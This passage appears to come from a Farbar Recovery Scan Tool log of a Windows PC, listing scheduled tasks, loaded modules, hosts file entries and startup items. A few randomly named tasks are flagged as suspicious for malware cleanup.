Task: {59F31DCF-1022-4FBB-B062-6155DD376030} - System32\Tasks\{25DA523B-4276-4B94-9F54-6B6F2F9BB0DC} => C:\Windows\system32\pcalua.exe -a "D:\Downloads\Might and Magic 8 - Day of the Destroyer\disk1\SETUP.EXE" -d "D:\Downloads\Might and Magic 8 - Day of the Destroyer\disk1"
Task: {5C0F6FAB-C543-47B7-8B37-1CB999B0A3F6} - System32\Tasks\GoogleUpdateTaskMachineUA1d1e954a9bce6e4 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {66314D17-1728-4DFF-93EA-99638DF73295} - System32\Tasks\SogouImeMgr => C:\Program Files (x86)\SogouInput\SogouExe\SogouExe.exe [2016-07-05] (Sogou.com Inc.)
Task: {73DDBEFC-98E4-41FC-8D01-59D749193B31} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: {74E7CA0C-4B28-4B51-B431-EAFEEC2EB294} - System32\Tasks\mjg2kyft => C:\Program Files\Common Files\0jkxweer\b2137hepploxh.exe <==== ATTENTION
Task: {87AE34E6-B14F-4AAB-A8E8-F1DEF741ED83} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-12-13] (NVIDIA Corporation)
Task: {881A0E55-4E38-49A5-9641-768766D0A535} - System32\Tasks\{DAD9CBED-549D-4F2C-8BF9-808CCD0C46DD} => J:\Games\Warhammer - End Times - Vermintide\launcher\launcher.exe
Task: {8884DD84-15D2-4DAA-B0B8-621FB4071B5A} - System32\Tasks\{7AAE58DB-FEDD-4709-80F1-4C47189C15DD} => C:\Windows\system32\pcalua.exe -a "F:\Red Alert 2 Yuri's Revenge Full Version\Yuri's Revenge\Setup\Setup.exe" -d "F:\Red Alert 2 Yuri's Revenge Full Version\Yuri's Revenge\Setup"
Task: {8D858AC0-A1AC-4B7E-ACBA-31A70FB01A58} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2016-12-13] (NVIDIA Corporation)
Task: {901B998E-9819-4372-A93E-A2DD9E9B0D41} - System32\Tasks\{340AC26E-1C1D-4E6C-90B6-BD6F20B6CF52} => C:\Users\w7\Desktop\Setup.exe
Task: {93FDC8CF-79C9-4A13-B497-F9AD2F195CDB} - System32\Tasks\{36C6CD00-8371-4750-BB94-73D7CE8F8157} => C:\Program Files (x86)\随e行WLAN\随e行WLAN.exe [2014-06-20] (China Mobile)
Task: {97CE1122-7664-4679-8B4A-3CA552606766} - System32\Tasks\lar3es1h => C:\Program Files\Common Files\4eubx1r5\c15b9htfdo2ym.exe <==== ATTENTION
Task: {9EEB5A65-67A5-4770-9FE2-32B2315E3927} - System32\Tasks\{145128C2-7E78-4FC9-8DE6-F69DEC626214} => D:\Games\R.G. Catalyst\Might&Magic Heroes VI\Might & Magic Heroes VI.exe [2013-04-25] (Virtuos)
Task: {A84E3583-0BE1-4E8C-91C2-B7971B26FF7B} - System32\Tasks\{62D93F64-B9ED-4595-992B-3F5FE86F8A70} => C:\Windows\system32\pcalua.exe -a C:\Users\w7\Downloads\seita.exe -d C:\Users\w7\Downloads
Task: {A9EA78CA-1B28-4A2A-9155-8E664E47C2DD} - System32\Tasks\{E6A1A9E4-74B3-4DE1-A266-4462ACC3D0C7} => C:\Windows\system32\pcalua.exe -a H:\Setup.exe -d H:\
Task: {AA09BD39-5C41-4061-B07B-BF3E8C1098F5} - System32\Tasks\GoogleUpdateTaskMachineCore1cff2c37ee024d1 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {AE947B6B-B166-4B74-876F-CD6436C4FE20} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {C3A4EAAF-8237-4FAA-9680-EDB028564D41} - System32\Tasks\inyraupuat => C:\Windows\system32\config\systemprofile\AppData\Local\Stimtandax [Argument = /t 1632 2932] <==== ATTENTION
Task: {CB812416-FC8E-48AA-9C99-246D98AA6138} - System32\Tasks\{549E870F-3A61-4E72-AE24-36E2173BC051} => C:\Windows\system32\pcalua.exe -a C:\Users\w7\Downloads\vcredist_x86.exe -d C:\Users\w7\Downloads
Task: {CEC86FC3-55E6-4DC2-866E-7701B5B8A8D4} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {D4C9C383-D2FD-4DC8-9DCA-3639AFA37B10} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-12-13] (NVIDIA Corporation)
Task: {E6D93E7E-0484-4ED9-A4D9-F0E74CFAD0E2} - System32\Tasks\{3C2C09C0-2730-45A4-9529-26B7382549A7} => J:\Supreme Commander 2\bin\SupremeCommander2.exe
Task: {EBCEB8D1-658F-4BDA-BB64-8B84735D76E4} - System32\Tasks\{417D708E-D95D-4567-BEA1-C8D34A63673C} => D:\Downloads\Might and Magic 8 - Day of the Destroyer\disk1\SETUP.EXE
Task: {F1D00AF5-BFE1-452E-B728-8F4317B79342} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-12-13] (NVIDIA Corporation)
Task: {FE717329-F074-4198-9C97-DEEBF3950998} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2016-12-13] (NVIDIA Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\w7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk -> C:\Users\w7\AppData\Roaming\.minecraft\minecraft launcher\Debug.bat ()
Shortcut: C:\Users\w7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Golden Axe (1990)\Friend in War\Golden Axe (1990)\Golden Axe (1990).lnk -> C:\Friend in War\Golden Axe (1990)\start.bat ()
Shortcut: C:\Users\w7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Friend in War\Golden Axe (1990)\Golden Axe (1990).lnk -> C:\Friend in War\Golden Axe (1990)\start.bat ()
 
==================== Loaded Modules (Whitelisted) ==============
 
2014-08-31 13:12 - 2016-12-12 10:37 - 000018880 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2014-08-31 13:12 - 2016-12-12 02:47 - 000134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-06-04 16:32 - 2015-10-10 13:00 - 000707624 _____ () C:\Users\w7\AppData\Roaming\ytmediacenter\X64\cmc64.dll
2015-03-07 08:07 - 2015-03-07 08:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2016-09-30 05:13 - 2016-09-30 05:13 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 08:07 - 2015-03-07 08:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2016-09-30 05:13 - 2016-09-30 05:13 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2016-12-14 11:47 - 2016-12-13 07:35 - 001147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-12-14 11:47 - 2016-12-13 07:36 - 004489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-05-11 08:48 - 2016-05-11 08:48 - 000041472 _____ () C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe
2016-04-27 12:25 - 2013-11-18 11:44 - 000585416 _____ () C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
2017-08-03 15:18 - 2017-06-27 12:06 - 002260432 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2017-08-10 12:17 - 2017-08-07 19:30 - 000018840 _____ () C:\Program Files (x86)\StrongVPN\CrashReporter.dll
2017-08-08 21:58 - 2017-08-02 15:39 - 003824472 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.90\libglesv2.dll
2017-08-08 21:58 - 2017-08-02 15:39 - 000100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.90\libegl.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000152000 _____ () C:\Program Files\VideoLAN\VLC\libvlc.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 002763200 _____ () C:\Program Files\VideoLAN\VLC\libvlccore.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000626624 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000046016 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000042944 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000091072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirect3d_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000083392 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 002568640 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000118720 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000267712 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000091072 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libvdr_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000059328 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000074176 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000684480 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000833984 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000140224 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000055232 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\librar_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000150464 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 001605056 _____ () C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000349120 _____ () C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 001487808 _____ () C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000028608 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libwin_msg_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000068032 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000238016 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000051648 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libwin_hotkeys_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 012298176 _____ () C:\Program Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000049600 _____ () C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libfolder_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000330688 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libjpeg_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000031168 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libcdg_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000347584 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 001521088 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libschroedinger_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000844736 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libvorbis_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000339392 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libtheora_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000032704 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libdts_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000049600 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libaraw_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000056256 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libsubstx3g_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000437696 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libflac_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000038848 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libg711_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000028096 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libaes3_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000199616 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libspeex_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 003009472 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liblibass_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000426432 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libfaad_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000031680 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liba52_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000031168 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libmpeg_audio_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000035264 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liblpcm_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000455616 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libopus_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000135104 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libdvbsub_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000032192 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libspudec_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 015975872 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libavcodec_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000916928 _____ () C:\Program Files\VideoLAN\VLC\plugins\text_renderer\libfreetype_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000051136 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_sse2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000037824 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_mmx_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000816576 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libswscale_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000041920 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_sse2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000133056 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_sse2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000068032 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_mmx_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000033216 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_mmx_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000046528 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i422_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000030656 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libgrey_yuv_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000059840 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i420_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000042944 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000053696 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000043456 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000034240 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libscaletempo_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_i420_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 001515456 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libsamplerate_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscale_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libyuvp_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000033216 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libsharpen_plugin.dll
2015-09-16 11:25 - 2015-09-16 11:25 - 000367104 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxDDU.dll
2015-09-16 11:13 - 2015-09-16 11:13 - 003585536 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxRT.dll
2016-05-27 15:07 - 2016-05-27 15:07 - 000163816 _____ () C:\Program Files\Bignox\BigNoxVM\RT\NoxVMHandle.exe
2015-09-16 11:29 - 2015-09-16 11:29 - 002460160 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxVMM.DLL
2015-09-16 11:30 - 2015-09-16 11:30 - 000662016 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxREM.dll
2015-09-16 11:29 - 2015-09-16 11:29 - 000021504 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxSharedClipboard.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 000038400 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxDragAndDropSvc.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 000039936 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxGuestPropSvc.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 000037376 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxGuestControlSvc.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 001480192 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxDD.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 000192512 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxDD2.dll
2016-02-26 15:56 - 2016-02-26 15:56 - 000034816 _____ () C:\Program Files\Bignox\BigNoxVM\RT\NOXa.dll
2015-09-16 11:29 - 2015-09-16 11:29 - 000032256 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxSharedFolders.DLL
2016-08-09 03:55 - 2016-08-09 03:55 - 000815104 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\nox_adb.exe
2014-08-31 13:12 - 2016-12-12 10:37 - 000020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2017-02-16 19:19 - 2017-02-16 19:19 - 040622592 _____ () C:\Program Files (x86)\Letv\libcef.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000524720 _____ () C:\Program Files (x86)\Letv\DuiLib.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000318896 _____ () C:\Program Files (x86)\Letv\curllib.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000316336 _____ () C:\Program Files (x86)\Letv\CommDll.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000318896 _____ () C:\Users\w7\AppData\Roaming\Letv\AfterPlay\curllib.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000316336 _____ () C:\Users\w7\AppData\Roaming\Letv\AfterPlay\CommDll.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000524720 _____ () C:\Users\w7\AppData\Roaming\Letv\AfterPlay\DuiLib.dll
2016-12-14 11:47 - 2016-12-13 07:35 - 000900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-12-14 11:47 - 2016-12-13 07:35 - 003774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-12-14 11:47 - 2016-12-12 22:36 - 000525760 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-12-14 11:47 - 2016-12-12 22:36 - 000254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-12-14 11:47 - 2016-12-12 22:36 - 002808888 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-12-14 11:47 - 2016-12-12 22:36 - 000384568 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-12-14 11:47 - 2016-12-12 22:36 - 000447424 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-12-14 11:47 - 2016-12-12 22:36 - 000336832 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-12-14 11:47 - 2016-12-12 22:36 - 001003456 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2016-12-22 13:46 - 2016-12-12 22:36 - 000956472 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSDKAPINode.node
2014-08-31 13:07 - 2013-12-09 15:26 - 001242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000117262 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\libgcc_s_dw2-1.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 001026574 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\libstdc++-6.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 003758827 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\icuin53.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 002093901 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\icuuc53.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 003327416 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\icudt53.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000007168 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\firewall_mgr.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000169984 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\glut32.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000184320 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\NoxCommon.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000243200 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\VBoxApi.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000498688 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\hlog4qt1.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000019456 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\QtQuick.2\qtquick2plugin.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000900608 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000039424 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\QtWebKit\qmlwebkitplugin.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [99]
AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [86]
AlternateDataStreams: C:\ProgramData\TEMP:D5FBE8F9 [336]
AlternateDataStreams: C:\ProgramData\TEMP:DBC416F8 [86]
AlternateDataStreams: C:\Users\w7\Downloads\Naruto Shippuden 3D: The New Era *MULTi5* *READNFO* - (PortableROMs.com).rar [412830574]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\bankofchina.com -> hxxp://www.bankofchina.com
IE trusted site: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\boc.cn -> hxxps://ebs.boc.cn
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 10:34 - 2017-08-04 14:42 - 000001677 ____R C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       union.baidu2019.com
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       union.baidu2019.com
0.0.0.0                   telemetry.malwarebytes.com
192.168.1.101 windows10.microdone.cn0.0.0.0                   keystone.mwbsys.com
192.168.1.101 windows10.microdone.cn
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\w7\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 221.7.128.68 - 221.7.136.68
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^G3Server.lnk => C:\Windows\pss\G3Server.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Killer Network Manager.lnk => C:\Windows\pss\Killer Network Manager.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^w7^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MagicDisc.lnk => C:\Windows\pss\MagicDisc.lnk.Startup
MSCONFIG\startupfolder: C:^Users^w7^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^WireShare On Startup.lnk => C:\Windows\pss\WireShare On Startup.lnk.Startup
MSCONFIG\startupreg: 360cloud => "C:\Program Files (x86)\360\360WangPan\360WangPan.exe" /autostart
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
